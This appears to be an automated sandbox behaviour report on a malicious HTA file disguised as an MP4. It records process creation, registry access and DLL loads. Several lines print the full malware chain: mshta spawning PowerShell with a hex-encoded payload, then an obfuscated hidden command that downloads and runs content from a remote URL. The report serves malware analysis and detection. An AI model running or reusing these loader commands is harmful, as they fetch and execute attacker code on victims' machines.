              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jwmdcjh5.eyt.ps1Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: winwidgetshp.mp4.htaVirustotal: Detection: 14%
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\winwidgetshp.mp4.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D8Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
